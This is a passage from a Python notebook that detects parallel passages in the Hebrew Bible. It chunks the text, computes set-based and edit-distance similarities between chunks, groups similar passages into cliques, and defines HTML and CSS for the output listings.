DUB_CLIQUE_RATIO = 15
REC_CLIQUE_RATIO = 5
LARGE_CLIQUE_SIZE = 50
CLIQUES_PER_FILE = 50
# In[21]:
# assessing results
VALUE_LABELS = dict(
    mis="no results available",
    rec="promising results: recommended",
    dep="messy results: deprecated",
    dub="mixed quality: take care",
    out="method deprecated",
    nor="unassessed quality: inspection needed",
    lr="this experiment is the last one run",
)
# Note that TF_TABLE and LOCAL_BASE_COMP are deliberately
# located in the version-independent
# part of the tempdir.
# Here the results of expensive calculations are stored,
# to be used by all versions.
# In[22]:
# crossrefs for TF
TF_TABLE = "{}/parallelTable.tsv".format(allTemp)
# In[23]:
# crossrefs for SHEBANQ
SHEBANQ_MATRIX = (False, "verse", "SET")
SHEBANQ_SIMILARITY = 65
SHEBANQ_TOOL = "parallel"
CROSSREF_STATUS = "!"
CROSSREF_KEYWORD = "crossref"
# In[24]:
# progress indication
VERBOSE = False
MEGA = 1000000
KILO = 1000
SIMILARITY_PROGRESS = 5 * MEGA
CLIQUES_PROGRESS = 1 * KILO
# In[25]:
# locations and hyperlinks
LOCAL_BASE_COMP = "{}/calculus".format(allTemp)
LOCAL_BASE_OUTP = "files"
EXPERIMENT_DIR = "experiments"
EXPERIMENT_FILE = "experiments"
EXPERIMENT_PATH = "{}/{}.txt".format(LOCAL_BASE_OUTP, EXPERIMENT_FILE)
EXPERIMENT_HTML = "{}/{}.html".format(LOCAL_BASE_OUTP, EXPERIMENT_FILE)
NOTES_FILE = "crossref"
NOTES_PATH = "{}/{}.csv".format(LOCAL_BASE_OUTP, NOTES_FILE)
STORED_CLIQUE_DIR = "stored/cliques"
STORED_MATRIX_DIR = "stored/matrices"
STORED_CHUNK_DIR = "stored/chunks"
CHAPTER_DIR = "chapters"
CROSSREF_DB_FILE = "crossrefdb.csv"
CROSSREF_DB_PATH = "{}/{}".format(LOCAL_BASE_OUTP, CROSSREF_DB_FILE)
# ## 5.3 Experiment settings
#
# For each experiment we have to adapt the configuration settings to the parameters that define the experiment.
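# A toy sketch (not the notebook's code) of the invalidation cascade that ``do_params`` below implements:
# changing the chunking forces every stage to be redone, changing the similarity method redoes
# preparing/similarity/cliqueing, and changing only the threshold redoes just the cliqueing.
# The parameter names here are hypothetical stand-ins.

```python
def stages_to_redo(old, new):
    # pipeline stages in order; a changed parameter invalidates the
    # stage it first affects and everything after it
    stages = ("chunk", "prep", "sim", "clique")
    first_stage = {"chunking": 0, "method": 1, "threshold": 3}
    redo = set()
    for param, start in first_stage.items():
        if old[param] != new[param]:
            redo.update(stages[start:])
    return redo
```

For example, rerunning with only a new threshold leaves chunks, preparations and the similarity matrix untouched.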
# In[26]:
def reset_params():
    global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
    global SIMILARITY_METHOD, SIMILARITY_THRESHOLD, MATRIX_THRESHOLD
    global meta
    meta = collections.OrderedDict()
    # chunking
    CHUNK_FIXED = None  # kind of chunking: fixed size or by object
    CHUNK_SIZE = None  # only relevant for CHUNK_FIXED = True
    CHUNK_OBJECT = None  # only relevant for CHUNK_FIXED = False; see CHUNK_OBJECTS above
    CHUNK_LB = None  # computed from CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT
    CHUNK_DESC = None  # computed from CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT
    # similarity
    MATRIX_THRESHOLD = None  # minimal similarity used to fill the matrix of similarities
    SIMILARITY_METHOD = None  # see SIM_METHODS above
    SIMILARITY_THRESHOLD = None  # minimal similarity used to put elements together in cliques
# In[27]:
def set_matrix_threshold(sim_m=None, chunk_o=None):
    global MATRIX_THRESHOLD
    the_sim_m = SIMILARITY_METHOD if sim_m is None else sim_m
    the_chunk_o = CHUNK_OBJECT if chunk_o is None else chunk_o
    if the_sim_m == "SET":
        MATRIX_THRESHOLD = 30 if the_chunk_o == "chapter" else 50
    else:
        MATRIX_THRESHOLD = 55 if the_chunk_o == "chapter" else 60
# In[28]:
def do_params_chunk(chunk_f, chunk_i):
    global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
    do_chunk = False
    if (
        chunk_f != CHUNK_FIXED
        or (chunk_f and chunk_i != CHUNK_SIZE)
        or (not chunk_f and chunk_i != CHUNK_OBJECT)
    ):
        do_chunk = True
        CHUNK_FIXED = chunk_f
        if chunk_f:
            CHUNK_SIZE = chunk_i
        else:
            CHUNK_OBJECT = chunk_i
    CHUNK_LB = CHUNK_LBS[CHUNK_FIXED]
    CHUNK_DESC = CHUNK_SIZE if CHUNK_FIXED else CHUNK_OBJECT
    for p in (
        "{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR),
        "{}/{}".format(LOCAL_BASE_COMP, STORED_CHUNK_DIR),
    ):
        if not os.path.exists(p):
            os.makedirs(p)
    return do_chunk
# In[29]:
def do_params(chunk_f, chunk_i, sim_m, sim_thr):
    global CHUNK_FIXED, CHUNK_SIZE, CHUNK_OBJECT, CHUNK_LB, CHUNK_DESC
    global SIMILARITY_METHOD, SIMILARITY_THRESHOLD, MATRIX_THRESHOLD
    global meta
    do_chunk = False
    do_prep = False
    do_sim = False
    do_clique = False
    meta = collections.OrderedDict()
    if (
        chunk_f != CHUNK_FIXED
        or (chunk_f and chunk_i != CHUNK_SIZE)
        or (not chunk_f and chunk_i != CHUNK_OBJECT)
    ):
        do_chunk = True
        do_prep = True
        do_sim = True
        do_clique = True
        CHUNK_FIXED = chunk_f
        if chunk_f:
            CHUNK_SIZE = chunk_i
        else:
            CHUNK_OBJECT = chunk_i
    if sim_m != SIMILARITY_METHOD:
        do_prep = True
        do_sim = True
        do_clique = True
        SIMILARITY_METHOD = sim_m
    if sim_thr != SIMILARITY_THRESHOLD:
        do_clique = True
        SIMILARITY_THRESHOLD = sim_thr
    set_matrix_threshold()
    if SIMILARITY_THRESHOLD < MATRIX_THRESHOLD:
        return (False, False, False, False, True)
    CHUNK_LB = CHUNK_LBS[CHUNK_FIXED]
    CHUNK_DESC = CHUNK_SIZE if CHUNK_FIXED else CHUNK_OBJECT
    meta["CHUNK TYPE"] = (
        "FIXED {}".format(CHUNK_SIZE)
        if CHUNK_FIXED
        else "OBJECT {}".format(CHUNK_OBJECT)
    )
    meta["MATRIX THRESHOLD"] = MATRIX_THRESHOLD
    meta["SIMILARITY METHOD"] = SIMILARITY_METHOD
    meta["SIMILARITY THRESHOLD"] = SIMILARITY_THRESHOLD
    for p in (
        "{}/{}".format(LOCAL_BASE_OUTP, EXPERIMENT_DIR),
        "{}/{}".format(LOCAL_BASE_OUTP, CHAPTER_DIR),
        "{}/{}".format(LOCAL_BASE_COMP, STORED_CLIQUE_DIR),
        "{}/{}".format(LOCAL_BASE_COMP, STORED_MATRIX_DIR),
        "{}/{}".format(LOCAL_BASE_COMP, STORED_CHUNK_DIR),
    ):
        if not os.path.exists(p):
            os.makedirs(p)
    return (do_chunk, do_prep, do_sim, do_clique, False)
# In[30]:
reset_params()
# ## 5.4 Chunking
#
# We divide the text into chunks to be compared. The result is ``chunks``,
# which is a list of lists.
# Every chunk is a list of word nodes.
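# The fixed-size variant below cuts each book into ``n // size`` chunks and spreads the
# ``n % size`` remainder words evenly over them. A standalone sketch of that distribution,
# with toy word lists (integers instead of word nodes):

```python
def fixed_chunks(words, size):
    nwords = len(words)
    nchunks = nwords // size
    if nchunks == 0:  # a book shorter than one chunk stays whole
        return [list(words)]
    # every chunk grows by `common`; the first `special` chunks by one more
    common, special = divmod(nwords % size, nchunks)
    chunks, pos = [], 0
    for i in range(nchunks):
        step = size + common + (1 if i < special else 0)
        chunks.append(words[pos:pos + step])
        pos += step
    return chunks
```

This way no words are lost and chunk sizes differ by at most one word.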
# In[31]:
def chunking(do_chunk):
    global chunks, book_rank
    if not do_chunk:
        TF.info(
            "CHUNKING ({} {}): already chunked into {} chunks".format(
                CHUNK_LB, CHUNK_DESC, len(chunks)
            )
        )
        meta["# CHUNKS"] = len(chunks)
        return
    chunk_path = "{}/{}/chunk_{}_{}".format(
        LOCAL_BASE_COMP,
        STORED_CHUNK_DIR,
        CHUNK_LB,
        CHUNK_DESC,
    )
    if os.path.exists(chunk_path):
        with open(chunk_path, "rb") as f:
            chunks = pickle.load(f)
        TF.info(
            "CHUNKING ({} {}): Loaded: {:>5} chunks".format(
                CHUNK_LB,
                CHUNK_DESC,
                len(chunks),
            )
        )
    else:
        TF.info("CHUNKING ({} {})".format(CHUNK_LB, CHUNK_DESC))
        chunks = []
        book_rank = {}
        for b in F.otype.s("book"):
            book_name = F.book.v(b)
            book_rank[book_name] = b
            words = L.d(b, otype="word")
            nwords = len(words)
            if CHUNK_FIXED:
                nchunks = nwords // CHUNK_SIZE
                if nchunks == 0:
                    nchunks = 1
                    common_incr = nwords
                    special_incr = 0
                else:
                    rem = nwords % CHUNK_SIZE
                    common_incr = rem // nchunks
                    special_incr = rem % nchunks
                word_in_chunk = -1
                cur_chunk = -1
                these_chunks = []
                for w in words:
                    word_in_chunk += 1
                    if word_in_chunk == 0 or (
                        word_in_chunk
                        >= CHUNK_SIZE
                        + common_incr
                        + (1 if cur_chunk < special_incr else 0)
                    ):
                        word_in_chunk = 0
                        these_chunks.append([])
                        cur_chunk += 1
                    these_chunks[-1].append(w)
            else:
                these_chunks = [
                    L.d(c, otype="word") for c in L.d(b, otype=CHUNK_OBJECT)
                ]
            chunks.extend(these_chunks)
            chunkvolume = sum(len(c) for c in these_chunks)
            if VERBOSE:
                TF.info(
                    "CHUNKING ({} {}): {:<20s} {:>5} words; {:>5} chunks; sizes {:>5} to {:>5}; {:>5}".format(
                        CHUNK_LB,
                        CHUNK_DESC,
                        book_name,
                        nwords,
                        len(these_chunks),
                        min(len(c) for c in these_chunks),
                        max(len(c) for c in these_chunks),
                        "OK" if chunkvolume == nwords else "ERROR",
                    )
                )
        with open(chunk_path, "wb") as f:
            pickle.dump(chunks, f, protocol=PICKLE_PROTOCOL)
        TF.info("CHUNKING ({} {}): Made {} chunks".format(CHUNK_LB, CHUNK_DESC, len(chunks)))
    meta["# CHUNKS"] = len(chunks)
# ## 5.5 Preparing
#
# In order to compute similarities between chunks, we have to compile each chunk into the information that really matters for the comparison. This depends on the chosen method of similarity computation.
#
# ### 5.5.1 Preparing for SET comparison
#
# We reduce words to their lexemes (dictionary entries) and from them we also remove the alephs, waws, and yods.
# The lexeme feature also contains characters (`/ [ =`) to disambiguate homonyms. We remove these as well.
# If we end up with something empty, we skip it.
# Finally, we take the set of these reduced word lexemes, so that we effectively ignore the order and multiplicity of words. In other words: the resulting similarity will be based on lexeme content.
#
# ### 5.5.2 Preparing for LCS comparison
#
# Again, we reduce words to their lexemes as for the SET preparation, and we do the same weeding of consonants and empty strings. But then we concatenate everything, separated by a space. So we preserve order and multiplicity.
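# A minimal sketch of both preparations on hypothetical transliterated lexemes
# (made-up toy data, not actual BHSA output): map ayin (`<`) to `O`, strip the weak
# consonants and disambiguation marks, drop empty results, then either forget order
# and multiplicity (``SET``) or keep them (``LCS``).

```python
import re

EXCLUDED_PAT = re.compile(r"[>WJ=/\[]")  # as configured below

def prepare(lexemes, method):
    # clean each lexeme, then drop the ones that vanish entirely
    cleaned = (EXCLUDED_PAT.sub("", lx.replace("<", "O")) for lx in lexemes)
    nonempty = [lx for lx in cleaned if lx != ""]
    return frozenset(nonempty) if method == "SET" else " ".join(nonempty)
```

The same cleaning feeds both methods; only the final aggregation differs.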
# In[32]:
def preparing(do_prepare):
    global chunk_data
    if not do_prepare:
        TF.info(
            "PREPARING ({} {} {}): Already prepared".format(
                CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD
            )
        )
        return
    TF.info("PREPARING ({} {} {})".format(CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD))
    chunk_data = []
    if SIMILARITY_METHOD == "SET":
        for c in chunks:
            words = (
                EXCLUDED_PAT.sub("", Fs(LEX_FEATURE).v(w).replace("<", "O")) for w in c
            )
            clean_words = (w for w in words if w != "")
            this_data = frozenset(clean_words)
            chunk_data.append(this_data)
    else:
        for c in chunks:
            words = (
                EXCLUDED_PAT.sub("", Fs(LEX_FEATURE).v(w).replace("<", "O")) for w in c
            )
            clean_words = (w for w in words if w != "")
            this_data = " ".join(clean_words)
            chunk_data.append(this_data)
    TF.info(
        "PREPARING ({} {} {}): Done {} chunks.".format(
            CHUNK_LB, CHUNK_DESC, SIMILARITY_METHOD, len(chunk_data)
        )
    )
# ## 5.6 Similarity computation
#
# Here we implement our two ways of similarity computation.
# Both need a massive amount of work, especially for experiments with many small chunks.
# The similarities are stored in a ``matrix``, a data structure that stores a similarity number for each pair of chunk indexes.
# Most pairs of chunks will be dissimilar. In order to save space, we do not store similarities below a certain threshold.
# We store matrices for re-use.
#
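# The store-for-re-use pattern (applied below to chunks, matrices and cliques), sketched
# standalone: pickle the expensive result under a path that encodes every parameter it
# depends on, and load it when that path already exists. Path and data here are made up.

```python
import os
import pickle

def cached(path, compute):
    # return the pickled result if present, otherwise compute and store it
    if os.path.exists(path):
        with open(path, "rb") as f:
            return pickle.load(f)
    result = compute()
    with open(path, "wb") as f:
        pickle.dump(result, f, protocol=3)
    return result
```

Because the parameters are part of the file name, a changed experiment never reads a stale result.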
# ### 5.6.1 SET similarity
# The core is an operation on the sets, associated with the chunks by the prepare step. We take the cardinality of the intersection divided by the cardinality of the union.
# Intuitively, we compute the proportion of what two chunks have in common against their total material.
#
# In case the union is empty (both chunks have yielded an empty set), we deem the chunks not to be interesting as a parallel pair, and we set the similarity to 0.
#
# ### 5.6.2 LCS similarity
# The core is the method `ratio()`, taken from the Levenshtein module.
# Remember that the preparation step yielded a space-separated string of lexemes; these strings are compared on the basis of edit distance.
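# Both measures in miniature, applied to prepared forms like those from the previous step.
# The notebook takes ``ratio()`` from the Levenshtein module; here the standard library's
# ``SequenceMatcher.ratio()`` stands in for it (same 2*M/T idea, values can differ slightly).

```python
from difflib import SequenceMatcher

def sim_set(a, b):
    # percentage of shared lexemes over all lexemes; 0 when both sets are empty
    u = len(a | b)
    return 100 * len(a & b) / u if u != 0 else 0

def sim_lcs(a, b):
    # edit-distance-based similarity of the two lexeme strings
    return 100 * SequenceMatcher(isjunk=None, a=a, b=b, autojunk=False).ratio()
```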
# In[33]:
def similarity_post():
    nequals = len({x for x in chunk_dist if chunk_dist[x] >= 100})
    cmin = min(chunk_dist.values()) if len(chunk_dist) else "!empty set!"
    cmax = max(chunk_dist.values()) if len(chunk_dist) else "!empty set!"
    meta["LOWEST AVAILABLE SIMILARITY"] = cmin
    meta["HIGHEST AVAILABLE SIMILARITY"] = cmax
    meta["# EQUAL COMPARISONS"] = nequals
    TF.info(
        "SIMILARITY ({} {} {} M>{}): similarities between {} and {}. {} are 100%".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            cmin,
            cmax,
            nequals,
        )
    )
# In[34]:
def similarity(do_sim):
    global chunk_dist
    total_chunks = len(chunks)
    total_distances = total_chunks * (total_chunks - 1) // 2
    meta["# SIMILARITY COMPARISONS"] = total_distances
    SIMILARITY_PROGRESS = total_distances // 100
    if SIMILARITY_PROGRESS >= MEGA:
        sim_unit = MEGA
        sim_lb = "M"
    else:
        sim_unit = KILO
        sim_lb = "K"
    if not do_sim:
        TF.info(
            "SIMILARITY ({} {} {} M>{}): Using {:>5} {} ({}) comparisons with {} entries in matrix".format(
                CHUNK_LB,
                CHUNK_DESC,
                SIMILARITY_METHOD,
                MATRIX_THRESHOLD,
                total_distances // sim_unit,
                sim_lb,
                total_distances,
                len(chunk_dist),
            )
        )
        meta["# STORED SIMILARITIES"] = len(chunk_dist)
        similarity_post()
        return
    matrix_path = "{}/{}/matrix_{}_{}_{}_{}".format(
        LOCAL_BASE_COMP,
        STORED_MATRIX_DIR,
        CHUNK_LB,
        CHUNK_DESC,
        SIMILARITY_METHOD,
        MATRIX_THRESHOLD,
    )
    if os.path.exists(matrix_path):
        with open(matrix_path, "rb") as f:
            chunk_dist = pickle.load(f)
        TF.info(
            "SIMILARITY ({} {} {} M>{}): Loaded: {:>5} {} ({}) comparisons with {} entries in matrix".format(
                CHUNK_LB,
                CHUNK_DESC,
                SIMILARITY_METHOD,
                MATRIX_THRESHOLD,
                total_distances // sim_unit,
                sim_lb,
                total_distances,
                len(chunk_dist),
            )
        )
        meta["# STORED SIMILARITIES"] = len(chunk_dist)
        similarity_post()
        return
    TF.info(
        "SIMILARITY ({} {} {} M>{}): Computing {:>5} {} ({}) comparisons and saving entries in matrix".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            total_distances // sim_unit,
            sim_lb,
            total_distances,
        )
    )
    chunk_dist = {}
    wc = 0
    wt = 0
    if SIMILARITY_METHOD == "SET":
        # method SET: all chunks have been reduced to sets, ratio between lengths of intersection and union
        for i in range(total_chunks):
            c_i = chunk_data[i]
            for j in range(i + 1, total_chunks):
                c_j = chunk_data[j]
                u = len(c_i | c_j)
                # HERE COMES THE SIMILARITY COMPUTATION
                d = 100 * len(c_i & c_j) / u if u != 0 else 0
                # HERE WE STORE THE OUTCOME
                if d >= MATRIX_THRESHOLD:
                    chunk_dist[(i, j)] = d
                wc += 1
                wt += 1
                if wc == SIMILARITY_PROGRESS:
                    wc = 0
                    TF.info(
                        "SIMILARITY ({} {} {} M>{}): Computed {:>5} {} comparisons and saved {} entries in matrix".format(
                            CHUNK_LB,
                            CHUNK_DESC,
                            SIMILARITY_METHOD,
                            MATRIX_THRESHOLD,
                            wt // sim_unit,
                            sim_lb,
                            len(chunk_dist),
                        )
                    )
    elif SIMILARITY_METHOD == "LCS":
        # method LCS: chunks are sequence aligned, ratio between length of all common parts and total length
        for i in range(total_chunks):
            c_i = chunk_data[i]
            for j in range(i + 1, total_chunks):
                c_j = chunk_data[j]
                # HERE COMES THE SIMILARITY COMPUTATION
                d = 100 * ratio(c_i, c_j)
                # HERE WE STORE THE OUTCOME
                if d >= MATRIX_THRESHOLD:
                    chunk_dist[(i, j)] = d
                wc += 1
                wt += 1
                if wc == SIMILARITY_PROGRESS:
                    wc = 0
                    TF.info(
                        "SIMILARITY ({} {} {} M>{}): Computed {:>5} {} comparisons and saved {} entries in matrix".format(
                            CHUNK_LB,
                            CHUNK_DESC,
                            SIMILARITY_METHOD,
                            MATRIX_THRESHOLD,
                            wt // sim_unit,
                            sim_lb,
                            len(chunk_dist),
                        )
                    )
    with open(matrix_path, "wb") as f:
        pickle.dump(chunk_dist, f, protocol=PICKLE_PROTOCOL)
    TF.info(
        "SIMILARITY ({} {} {} M>{}): Computed {:>5} {} ({}) comparisons and saved {} entries in matrix".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            wt // sim_unit,
            sim_lb,
            wt,
            len(chunk_dist),
        )
    )
    meta["# STORED SIMILARITIES"] = len(chunk_dist)
    similarity_post()
# ## 5.7 Cliques
#
# Based on the value of ``SIMILARITY_THRESHOLD`` we pick the *interesting*
# similar pairs out of the similarity matrix. From these pairs we lump together our cliques.
#
# Our list of experiments will select various values for ``SIMILARITY_THRESHOLD``, which will result
# in various types of clique behavior.
#
# We store computed cliques for re-use.
#
# ### 5.7.1 Selecting passages
#
# We take all pairs from the similarity matrix which are above the threshold, and add both members to a list of passages.
#
# ### 5.7.2 Growing cliques
# We inspect all passages in our set and try to add them to the cliques we are growing.
# We start with an empty set of cliques.
# Each passage is added to a clique with which it has *enough familiarity*; otherwise it is added to a new clique.
# *Enough familiarity* means: the passage is similar to at least one member of the clique, with a similarity of at least ``SIMILARITY_THRESHOLD``.
# It is possible that a passage is thus added to more than one clique. In that case, those cliques are merged.
# This may lead to very large cliques if ``SIMILARITY_THRESHOLD`` is too low.
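# The growing step in miniature, on a toy similarity matrix (chunk indexes and
# percentages are made up): a passage joins every existing clique in which it has a
# similar-enough member, and all cliques it joins collapse into one.

```python
def grow_cliques(passages, dist, threshold):
    def sim(i, j):
        # the matrix stores each pair once, under the smaller index first
        return dist.get((i, j) if i < j else (j, i), 0)

    cliques = []
    for i in passages:
        hits = [c for c in cliques if any(sim(i, j) >= threshold for j in c)]
        merged = {i}.union(*hits)  # merge every clique the passage joins
        cliques = [c for c in cliques if c not in hits] + [merged]
    return cliques
```

Lowering the threshold lets transitive chains glue otherwise separate cliques together.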
# In[35]:
def key_chunk(i):
    c = chunks[i]
    w = c[0]
    return (
        -len(c),
        L.u(w, otype="book")[0],
        L.u(w, otype="chapter")[0],
        L.u(w, otype="verse")[0],
    )
# In[36]:
def meta_clique_pre():
    global similars, passages
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): inspecting the similarity matrix".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
        )
    )
    similars = {x for x in chunk_dist if chunk_dist[x] >= SIMILARITY_THRESHOLD}
    passage_set = set()
    for (i, j) in similars:
        passage_set.add(i)
        passage_set.add(j)
    passages = sorted(passage_set, key=key_chunk)
    meta["# SIMILAR COMPARISONS"] = len(similars)
    meta["# SIMILAR PASSAGES"] = len(passages)
# In[37]:
def meta_clique_pre2():
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): {} relevant similarities between {} passages".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
            len(similars),
            len(passages),
        )
    )
# In[38]:
def meta_clique_post():
    global l_c_l
    meta["# CLIQUES"] = len(cliques)
    scliques = collections.Counter()
    for c in cliques:
        scliques[len(c)] += 1
    l_c_l = max(scliques.keys()) if len(scliques) > 0 else 0
    totmn = 0
    totcn = 0
    for (ln, n) in sorted(scliques.items(), key=lambda x: x[0]):
        totmn += ln * n
        totcn += n
        if VERBOSE:
            TF.info(
                "CLIQUES ({} {} {} M>{} S>{}): {:>4} cliques of length {:>4}".format(
                    CHUNK_LB,
                    CHUNK_DESC,
                    SIMILARITY_METHOD,
                    MATRIX_THRESHOLD,
                    SIMILARITY_THRESHOLD,
                    n,
                    ln,
                )
            )
        meta["# CLIQUES of LENGTH {:>4}".format(ln)] = n
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): {} members in {} cliques".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
            totmn,
            totcn,
        )
    )
# In[39]:
def cliqueing(do_clique):
    global cliques
    if not do_clique:
        TF.info(
            "CLIQUES ({} {} {} M>{} S>{}): Already loaded {} cliques out of {} candidates from {} comparisons".format(
                CHUNK_LB,
                CHUNK_DESC,
                SIMILARITY_METHOD,
                MATRIX_THRESHOLD,
                SIMILARITY_THRESHOLD,
                len(cliques),
                len(passages),
                len(similars),
            )
        )
        meta_clique_pre2()
        meta_clique_post()
        return
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): fetching similars and chunk candidates".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
        )
    )
    meta_clique_pre()
    meta_clique_pre2()
    clique_path = "{}/{}/clique_{}_{}_{}_{}_{}".format(
        LOCAL_BASE_COMP,
        STORED_CLIQUE_DIR,
        CHUNK_LB,
        CHUNK_DESC,
        SIMILARITY_METHOD,
        MATRIX_THRESHOLD,
        SIMILARITY_THRESHOLD,
    )
    if os.path.exists(clique_path):
        with open(clique_path, "rb") as f:
            cliques = pickle.load(f)
        TF.info(
            "CLIQUES ({} {} {} M>{} S>{}): Loaded: {:>5} cliques out of {:>6} chunks from {} comparisons".format(
                CHUNK_LB,
                CHUNK_DESC,
                SIMILARITY_METHOD,
                MATRIX_THRESHOLD,
                SIMILARITY_THRESHOLD,
                len(cliques),
                len(passages),
                len(similars),
            )
        )
        meta_clique_post()
        return
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): Composing cliques out of {:>6} chunks from {} comparisons".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
            len(passages),
            len(similars),
        )
    )
    cliques_unsorted = []
    np = 0
    npc = 0
    for i in passages:
        added = None
        removable = set()
        for (k, c) in enumerate(cliques_unsorted):
            origc = tuple(c)
            for j in origc:
                d = (
                    chunk_dist.get((i, j), 0)
                    if i < j
                    else chunk_dist.get((j, i), 0)
                    if j < i
                    else 0
                )
                if d >= SIMILARITY_THRESHOLD:
                    if added is None:
                        # the passage has not been added to any clique yet
                        c.add(i)
                        added = k  # remember that we added the passage to this clique
                    else:
                        # the passage has already been added to another clique:
                        # we merge this clique with that one
                        cliques_unsorted[added] |= c
                        # we remember that we have merged this clique into another one,
                        # so we can throw away this clique later
                        removable.add(k)
                    break
        if added is None:
            cliques_unsorted.append({i})
        else:
            if len(removable):
                cliques_unsorted = [
                    c for (k, c) in enumerate(cliques_unsorted) if k not in removable
                ]
        np += 1
        npc += 1
        if npc == CLIQUES_PROGRESS:
            npc = 0
            TF.info(
                "CLIQUES ({} {} {} M>{} S>{}): Composed {:>5} cliques out of {:>6} chunks".format(
                    CHUNK_LB,
                    CHUNK_DESC,
                    SIMILARITY_METHOD,
                    MATRIX_THRESHOLD,
                    SIMILARITY_THRESHOLD,
                    len(cliques_unsorted),
                    np,
                )
            )
    cliques = sorted([tuple(sorted(c, key=key_chunk)) for c in cliques_unsorted])
    with open(clique_path, "wb") as f:
        pickle.dump(cliques, f, protocol=PICKLE_PROTOCOL)
    meta_clique_post()
    TF.info(
        "CLIQUES ({} {} {} M>{} S>{}): Composed and saved {:>5} cliques out of {:>6} chunks from {} comparisons".format(
            CHUNK_LB,
            CHUNK_DESC,
            SIMILARITY_METHOD,
            MATRIX_THRESHOLD,
            SIMILARITY_THRESHOLD,
            len(cliques),
            len(passages),
            len(similars),
        )
    )
# ## 5.8 Output
#
# We deliver the output of our experiments in various ways, all in HTML.
#
# We generate chapter-based diff outputs with color-highlighted differences between the chapters for every pair of chapters that merits it.
#
# For every (*good*) experiment, we produce a big list of its cliques, and for
# every such clique, we produce a diff-view of its members.
#
# Big cliques will be split into several files.
#
# Clique listings will also contain metadata: the value of the experiment parameters.
#
# ### 5.8.1 Format definitions
# Here are the definitions for formatting the (HTML) output.
# In[40]:
# clique lists
css = """
td.vl {
font-family: Verdana, Arial, sans-serif;
font-size: small;
text-align: right;
color: #aaaaaa;
width: 10%;
direction: ltr;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
td.ht {
font-family: Ezra SIL, SBL Hebrew, Verdana, sans-serif;
font-size: x-large;
line-height: 1.7;
text-align: right;
direction: rtl;
}
table.ht {
width: 100%;
direction: rtl;
border-collapse: collapse;
}
td.ht {
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
tr.ht.tb {
border-top: 2px solid #aaaaaa;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
tr.ht.bb {
border-bottom: 2px solid #aaaaaa;
border-left: 2px solid #aaaaaa;
border-right: 2px solid #aaaaaa;
}
span.m {
background-color: #aaaaff;
}
span.f {
background-color: #ffaaaa;
}
span.x {
background-color: #ffffaa;
color: #bb0000;
}
span.delete {
background-color: #ffaaaa;
}
span.insert {
background-color: #aaffaa;
}
span.replace {
background-color: #ffff00;
}
"""
# In[41]:
# chapter diffs
diffhead = """
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=UTF-8" />
<title></title>
<style type="text/css">
table.diff {
font-family: Ezra SIL, SBL Hebrew, Verdana, sans-serif;
font-size: x-large;
text-align: right;
}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}
</style>
</head>
"""
# In[42]:
# table of experiments
ecss = """
<style type="text/css">
.mis {background-color: #cccccc;}
.rec {background-color: #aaffaa;}
.dep {background-color: #ffaaaa;}
.dub {background-color: #ffddaa;}
.out {background-color: #ffddff;}
.nor {background-color: #fcfcff;}
.ps {font-weight: normal;}
.mx {font-style: italic;}
.cl {font-weight: bold;}
.lr {font-weight: bold; background-color: #ffffaa;}
p,td {font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: small;}
td {border: 1pt solid #000000; padding: 4pt;}
table {border: 1pt solid #000000; border-collapse: collapse;}
</style>
"""
# In[43]:
legend = """
<table>
<tr><td class="mis">{mis}</td></tr>
<tr><td class="rec">{rec}</td></tr>
<tr><td class="dep">{dep}</td></tr>
<tr><td class="dub">{dub}</td></tr>
<tr><td class="out">{out}</td></tr>
<tr><td class="nor">{nor}</td></tr>
</table>
""".format(
**VALUE_LABELS
)
# ### 5.8.2 Formatting clique lists
# In[44]:
def xterse_chunk(i):
    chunk = chunks[i]
    fword = chunk[0]
    book = L.u(fword, otype="book")[0]
    chapter = L.u(fword, otype="chapter")[0]
    return (book, chapter)
# In[45]:
def xterse_clique(ii):
    return tuple(sorted({xterse_chunk(i) for i in ii}))
# In[46]:
def terse_chunk(i):
    chunk = chunks[i]
    fword = chunk[0]
    book = L.u(fword, otype="book")[0]
    chapter = L.u(fword, otype="chapter")[0]
    verse = L.u(fword, otype="verse")[0]
    return (book, chapter, verse)
# In[47]:
def terse_clique(ii):
    return tuple(sorted({terse_chunk(i) for i in ii}))
# In[48]:
def verse_chunk(i):
    (bk, ch, vs) = i
    book = F.book.v(bk)
    chapter = F.chapter.v(ch)
    verse = F.verse.v(vs)
    text = "".join(
